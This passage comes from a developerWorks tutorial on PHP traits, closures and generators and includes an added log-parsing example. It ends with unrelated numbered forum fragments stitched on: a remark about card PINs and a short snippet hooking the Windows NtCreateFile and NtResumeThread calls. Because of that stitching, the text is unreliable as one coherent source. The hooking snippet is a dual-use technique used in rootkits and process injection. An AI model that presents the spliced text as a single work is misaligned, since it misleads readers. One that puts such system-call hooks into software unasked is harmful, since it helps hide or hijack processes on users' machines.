    Traits, added in PHP 5.4, are a facility for horizontal code reuse (whereas inheritance is vertical code reuse). In other languages this feature is sometimes called a mixin. The concept is straightforward in either case. A trait or mixin is a way to develop any number of methods once. Maybe you have some common methods for filtering and manipulating data or business logic that some objects should share. You can save them in a trait and then reuse them in any class that you want. Listing 5 shows a simplified example of providing a logging method that any class can use as a consistent way to log events.

    Listing 5. Declaring and using a trait

        <?php
        trait logging {
            private static $LOG_ERROR = 100;
            private static $LOG_WARNING = 50;
            private static $LOG_NOTICE = 10;
            protected $log_location = 'output.log';

            protected function log($level, $msg) {
                $output = [];
                $output[] = "Class: ".__CLASS__.' | ';
                $output[] = "Level: {$level} | ";
                $output = array_merge($output, (array)$msg, ["\n"]);
                // file_put_contents() accepts an array and writes its elements in order:
                file_put_contents($this->log_location, $output, FILE_APPEND);
            }
        }

        class User {
            use logging;

            public function __construct() {
                $this->log(self::$LOG_NOTICE, 'New User Created');
            }
        }

        class DB {
            use logging;
            private $db = 'localhost:8080';

            public function connect() {
                // ... attempt to connect and fail:
                $this->log(self::$LOG_ERROR, ['Connection Failed-', $this->db]);
            }
        }

    In Listing 5, the declaration of trait logging begins on line 2. Note that this trait contains a method as well as a number of properties (including static ones). On the surface, the declaration looks similar to that of a class, but it uses the trait keyword instead. Further down in Listing 5, to bring the trait into the User and DB classes, I use the use keyword again. The use logging; directive at the top of their class definitions essentially pulls all of the properties and methods from the logging trait into those classes natively. Now each class has access to all of the logging tools directly, without needing to implement them separately. The magic __CLASS__ constant used inside the trait resolves to the name of the class using the trait at that time, so the log messages are customized to the class automatically.

    READ: Traits documentation on php.net

    Closures (a.k.a. anonymous functions)

    With older versions of PHP, you could create functions programmatically via create_function, and there was a workaround for passing functions: sending a function's name as a string and then calling the function via call_user_func and call_user_func_array. This option lacked the elegance of genuine anonymous functions that can be passed between methods and classes or saved in variables with appropriate scope. Anonymous functions reign supreme in JavaScript, and PHP programmers who don't also know JavaScript are rare. So it was natural for PHP to evolve to include anonymous functions. As of PHP 5.3, you can use normal function-declaration syntax at any point where a variable could be used (for storage or passing). As an example, Listing 6 shows the old way of using the built-in sorting functions to specify your own custom sorting function.

    Listing 6. The old way of passing functions

        <?php
        $insurees = [
            'u4937' => ['name' => 'Thomas Smythe', 'age' => 33],
            'u1282' => ['name' => 'Gayle Runecor', 'age' => 25],
            'u9275' => ['name' => 'Sara Pinnicle', 'age' => 57],
            'u2078' => ['name' => 'Delilah Shock', 'age' => 41],
        ];

        // Sort oldest first; return 0 for equal ages so the order of ties is left alone.
        function insuree_age_sort($a, $b) {
            if ($a['age'] == $b['age']) {
                return 0;
            }
            return ($a['age'] > $b['age']) ? -1 : 1;
        }

        uasort($insurees, 'insuree_age_sort');

    Listing 6 is somewhat clunky because of the need to define a function in the same scope and then use it, even if you'll never use it again. With closures, you can now directly create and use the function in one step. Listing 7 shows an example of this much more elegant solution.

    Listing 7. Using an anonymous function for sorting

        <?php
        uasort($insurees, function ($a, $b) {
            if ($a['age'] == $b['age']) {
                return 0;
            }
            return ($a['age'] > $b['age']) ? -1 : 1;
        });

    Still, anyone would be hard-pressed to claim that this minor use case is the sole justification for this feature. But realize what is happening here. The function I create on the fly to pass into uasort() is a first-class value. You can store functions in variables and pass them around to different functions and classes. The real power of closures is evident when you look at the scoping feature that was added to PHP along with them. With the overloaded use keyword, you can specify which variables in the current scope the function should have access to. In this way, you can handle fairly complicated details without needing to pass them into the function each time you call it through its variable. The (somewhat contrived) examples in Listing 8 and Listing 9 demonstrate this power. Listing 8 uses inherited variable scope in a callback.

    Listing 8. Using inherited variable scope in a callback

        <?php
        // Find only people over a certain age
        $minage = 40;
        $over = array_filter($insurees, function($a) use ($minage) {
            return ($a['age'] >= $minage);
        });

    Listing 9 uses a closure with multiple captured variables and direct calls.

    Listing 9. Closures with multiple variables and direct calls

        <?php
        $urls = [
            'training' => '/training',
            'magazine' => '/magazine',
            't-shirt'  => '/swag/tshirts',
        ];
        $current = $_SERVER['REQUEST_URI']; // May come from somewhere else

        // Helper for links, ignoring links if we are on that page.
        // Only fixed strings from $urls and $name reach the output, so nothing
        // user-controlled is echoed here.
        $link = function($name) use ($urls, $current) {
            if ($current == $urls[$name]) {
                return $name;
            } else {
                return "<a href=\"{$urls[$name]}\">{$name}</a>";
            }
        };
        ?>
        <p>Welcome to our website! Make sure to check out our <?= $link('training') ?> offerings,
        see the latest issue of our <?= $link('magazine'); ?>, and don't forget to check out our
        latest <?= $link('t-shirt') ?> designs as well.</p>

    If you're used to working with closures in JavaScript, then you're already familiar with their power, flexibility, and sometimes dangerous nature.

    READ: Closures documentation on php.net

    Generators

    When PHP 5.0 was released, it came with the beginnings of the Standard PHP Library (SPL). The SPL was meant to be a collection of standardized ways to solve certain computer-science problems, such as creating queues and linked lists (and to provide extensible features such as class-file autoloaders). One feature included in the SPL is called an iterator. Iterator is an interface (with a collection of prebuilt classes) that you can use to make any class capable of being looped over as if it were an array, through the foreach keyword. This invention makes it possible for all "lists of things" to be walked over in a uniform fashion.

    But Iterator is a fairly heavyweight system that requires you to create a class and implement five methods (current, key, next, rewind, and valid). Sometimes you want the capability of a standard foreach loop but don't need the overhead of a class structure to achieve it. With the newer generator feature (PHP 5.5), you can, via the yield keyword, make a function that generates a list of values and offers them back one at a time. Essentially, instead of returning one value, you yield as many values as you want. Then you can use a foreach loop on your function to retrieve all the values that the function wants to yield back. Listing 10 shows a simple example of a function that divides a range of values into equal parts and returns them.

    Listing 10. A generator to divide into parts

        <?php
        function parts($start, $end, $parts) {
            // Find what our actual length is:
            $length = $end - $start;
            do {
                $start += $length / $parts;
                yield $start;
            } while ($start < $end);
        }

        // Break 5 feet into 3 parts:
        foreach (parts(0, 5, 3) as $l) {
            echo $l, " ";
        }
        echo "\n";

        // Break the range 10-90 into 12 parts:
        foreach (parts(10, 90, 12) as $l) {
            echo $l, " ";
        }
        echo "\n";

    The magic happens on line 7, where the yield keyword is used. At this point the function essentially stops executing, and the value that was yielded is handed back. On each subsequent iteration, execution resumes where it left off, until the next yield happens or the function ends. This example is obviously rather contrived, but you could imagine using this technique over the results of a database query, or over the results returned from parsing an XML file. You can even yield keys as well as values, to directly mimic an array, by using the syntax yield $key => $value, as shown in the XML-based example in Listing 11.

    Listing 11. Using a generator to process XML

        <?php
        $xml = <<<EOXML
        <?xml version="1.0" encoding="UTF-8" ?>
        <products>
          <books>
            <book isbn="978-1940111001">Mastering the SPL Library</book>
            <book isbn="978-1940111056">Functional Programming in PHP</book>
            <book isbn="978-0981034508">Guide to Date and Time Programming</book>
            <book isbn="0973589825">Guide to PHP Design Patterns</book>
          </books>
        </products>
        EOXML;

        $books = function () use ($xml) {
            $products = simplexml_load_string($xml);
            foreach ($products->books->book as $book) {
                // Cast the attribute so the key is a plain string, not a SimpleXMLElement:
                yield (string)$book['isbn'] => (string)$book;
            }
        };

        foreach ($books() as $isbn => $title) {
            echo "{$isbn}: {$title}\n";
        }

    READ: Generators documentation on php.net

    And much, much more ...

    All of the new features in PHP are too numerous to cover here in detail. Table 1 is a quick list of some other notable additions from the last few years.

    Table 1. Other new PHP language features

    Late static binding (5.3)
        The ability for a parent class to call a static method or property that is defined by one of its children/inheritors (the opposite of how this is usually done). For example, it allows generic functionality to exist in a parent class that takes in configuration from its extended children.

    Nowdoc syntax (5.3)
        The ability to specify a string as a block of text without variables within it being interpreted.

    Shortcut ternary (?:) (5.3)
        The ability to omit the middle of a standard ternary operator, such that the true branch defaults back to the original comparison value. Example: $result = $value ?: 0;

    Jump labels (goto) (5.3)
        While not considered by some to be 'moving forward' with the language, the goto operator was added so that certain coding exercises, such as the creation of state machines, could more easily be done inside PHP.

    Magic methods __callStatic (5.3), __invoke (5.3), __debugInfo (5.6)
        These three new magic methods were added to the others available since PHP 5.0 to complete the powerful slate of options you can use when designing your classes. Now you can have overloaded and undefined static methods, call your object as if it were a function, and control what's output when you debug your object.

    Always-on short echo tag (<?=) (5.4)
        Previously, if you had disabled short open tags in PHP, all variations were turned off. As of PHP 5.4, the <?= tag, which is commonly used in templating, is always available to you.

    Short array syntax (5.4)
        Instead of declaring your arrays as array(1,2,3), you can now use brackets, as in [1,2,3].

    Built-in web server (5.4)
        The PHP runtime now comes with a built-in web server, making it much easier to do simple code testing and development without the need to configure Apache or IIS.

    Conclusion

    Modern PHP development doesn't look anything like the old procedural code of days past. And PHP continues to sustain a high rate of development. PHP 7 is already on the horizon, with a late 2015 release date planned. The next installment of this series will look at the ever-changing requirements for password protection and what PHP has been doing to help web developers handle this complex requirement.

    Resources

    PHP project resources: Check out the developerWorks PHP project resources to expand your PHP skills.
    "Leveraging PHP V5.3 namespaces for readable and maintainable code" (Dan Denoncourt, developerWorks, March 2011): Get an overview of namespace syntax, learn best practices for its use, and see a miniature sample Model-View-Controller application that uses namespaces.
    "Leveraging PHP 5.3's lambdas and closures" (Dan Denoncourt, developerWorks, December 2010): Learn more about how and where to use PHP closures.
    More PHP content: Browse all the PHP content on developerWorks.
    PHP: The Right Way: Learn more about how to build PHP projects in a modern fashion.
    PHP Manual: Consult the official source of all PHP documentation.
    PHPDeveloper.org: Get news, views, and community information for PHP.
    php[architect]: Check out an online and print magazine dedicated to PHP education and recent news.

    Source: http://www.ibm.com/developerworks/web/library/wa-php-renewed_1/index.html?ca=drs-
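    The generator and closure material in the article above, put together in one runnable script. This is an added example, not code from the developerWorks article or its author: a generator parses constructed web-server log lines one at a time (the three log lines are made up for this example), a closure captures a threshold with use, and the keyed-yield form is used to show one behaviour the article's Listing 11 does not mention, namely what iterator_to_array() does when several entries yield the same key. The names parseAccessLog, $isError and $minStatus are my own.

```php
<?php
// Added example, not from the article. Constructed sample input: three
// access-log lines in common log format, two of them from the same client.
$accessLog = <<<'LOG'
203.0.113.7 - - [10/Oct/2014:13:55:36 +0000] "GET /index.php HTTP/1.1" 200 2326
203.0.113.7 - - [10/Oct/2014:13:55:40 +0000] "GET /admin.php HTTP/1.1" 403 512
198.51.100.9 - - [10/Oct/2014:13:56:01 +0000] "POST /login.php HTTP/1.1" 500 0
LOG;

/**
 * Generator: parse one log line per iteration instead of building an
 * array of every entry first, so memory stays flat for large logs.
 * Yields client IP => parsed fields (hypothetical helper, PHP 5.5+).
 */
function parseAccessLog($text)
{
    $pattern = '/^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\d+|-)$/';

    // strtok hands back one line at a time; only that line is in scope.
    for ($line = strtok($text, "\n"); $line !== false; $line = strtok("\n")) {
        if (!preg_match($pattern, $line, $m)) {
            continue; // skip lines that do not match the expected format
        }
        yield $m[1] => [
            'time'   => $m[2],
            'method' => $m[3],
            'path'   => $m[4],
            'status' => (int) $m[5],
            'bytes'  => $m[6] === '-' ? 0 : (int) $m[6],
        ];
    }
}

// Closure: the threshold is captured from the enclosing scope with `use`,
// so the predicate can be passed around without an extra argument.
$minStatus = 400;
$isError = function (array $entry) use ($minStatus) {
    return $entry['status'] >= $minStatus;
};

// Walk the generator with foreach; nothing is materialised up front.
foreach (parseAccessLog($accessLog) as $ip => $entry) {
    if ($isError($entry)) {
        printf("%s %s %s -> %d\n", $ip, $entry['method'], $entry['path'], $entry['status']);
    }
}

// Caveat: with preserve_keys left at its default of true, iterator_to_array()
// keeps only the LAST value for a repeated key, so the two 203.0.113.7
// entries collapse into one. Pass false to keep every yielded value.
$byIp = iterator_to_array(parseAccessLog($accessLog));
$all  = iterator_to_array(parseAccessLog($accessLog), false);
printf("%d distinct IPs, %d requests\n", count($byIp), count($all));
```

    Run it with php from the command line. The foreach loop prints only the 403 and 500 requests, and the final line shows fewer entries in the keyed array than in the unkeyed one, because the repeated client IP overwrote its earlier entry. The same preserve_keys behaviour is why the key yielded from a generator should be a scalar: with an object key such as an uncast SimpleXMLElement attribute, foreach works but iterator_to_array() fails with an illegal offset type, which is why the cast in Listing 11 matters.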
  23. Nytro

    Card PIN. Wtf?

    Be careful.
  24. You have /chat.
  25. It's great that it's so easy to use:

        //Hook NtCreateFile and NtResumeThread
        AddProxyProcedure("NtCreateFile", 11, NewNtCreateFile);
        AddProxyProcedure("NtResumeThread", 2, NewNtResumeThread);